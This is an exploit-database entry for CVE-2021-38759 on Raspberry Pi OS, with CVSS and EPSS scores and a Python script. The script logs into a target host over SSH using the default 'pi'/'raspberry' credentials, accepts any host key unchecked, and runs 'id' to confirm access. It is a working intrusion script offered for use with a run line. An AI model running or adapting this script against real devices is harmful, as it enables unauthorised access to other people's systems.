CVSS3: 9.8 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 10 High
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: COMPLETE
  Integrity Impact: COMPLETE
  Availability Impact: COMPLETE
  Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.043 Low
  Percentile: 92.2%

# Exploit Title: Raspberry Pi 5.10 - Default Credentials
# Exploit Author: netspooky
# Vendor Homepage: https://www.raspberrypi.com/
# Software Link: https://www.raspberrypi.com/software/operating-systems/
# Version: Raspberry Pi OS <= 5.10
# Tested on: Raspberry Pi OS 5.10
# CVE : CVE-2021-38759
# Initial Release: https://twitter.com/netspooky/status/1468603668266209280
# Run: $ python3 exploit.py IP
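import sys

import paramiko

host = sys.argv[1]
# Default account shipped with Raspberry Pi OS images (CVE-2021-38759)
username = "pi"
password = "raspberry"

client = paramiko.client.SSHClient()
# Accept the host key without verification
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(host, username=username, password=password)
# A successful login with the defaults is shown by the output of `id`
stdin, stdout, stderr = client.exec_command("id")
print(stdout.read().decode())
client.close()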